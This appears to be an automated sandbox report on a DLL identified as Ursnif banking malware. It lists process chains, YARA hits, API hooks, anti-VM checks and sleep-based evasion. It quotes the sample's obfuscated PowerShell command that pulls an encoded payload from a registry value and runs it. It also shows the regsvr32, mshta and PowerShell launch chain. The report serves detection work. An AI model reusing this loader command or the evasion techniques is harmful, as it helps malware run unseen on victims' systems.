Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17426 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82968 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17442 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8C67.tmp' 'c:\Users\user\AppData\Local\Temp\crd40oh3\CSC11E966FB2F624BF1AF64E9C63E9FBAC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9D01.tmp' 'c:\Users\user\AppData\Local\Temp\pzrffmak\CSCDD4D36881852409F9BC7C75CEAE11B9.TMP'

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 6007d134e83fctar.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 6007d134e83fctar.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 6007d134e83fctar.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000022.00000002.411809654.000001F23FCA0000.00000002.00000001.sdmp, csc.exe, 00000026.00000002.422411494.000001D454620000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.431440202.0000000005950000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdb source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp
Source:	Binary string: c:\Movenear\AgoSection\placeRace\Liquid.pdb source: 6007d134e83fctar.dll
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.pdbXP source: powershell.exe, 00000020.00000002.450999766.000001AE45C50000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.pdbXP source: powershell.exe, 00000020.00000002.450828267.000001AE45BD8000.00000004.00000001.sdmp

Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 6007d134e83fctar.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04391007 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_04391007

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6007d134e83fctar.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A1CB0 push ecx; ret	1_2_043A1CB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04392746 push ecx; mov dword ptr [esp], 00000002h	1_2_04392747
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A21A3 push ecx; ret	1_2_043A21B3

Source: initial sample

Static PE information: section name: .text entropy: 6.91369474093

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.316329983.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316516876.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.440594075.0000000004380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.371413612.0000000004B8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316461179.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316586724.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.428145674.000001AE5B310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316557679.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316421566.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316536119.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.316489077.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.428887884.0000000000950000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4896, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4688, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\mshta.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3861

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pzrffmak\pzrffmak.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\crd40oh3\crd40oh3.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880

Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_043A056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_043A056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0438BF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_0438BF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_0439AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_0439AF0E
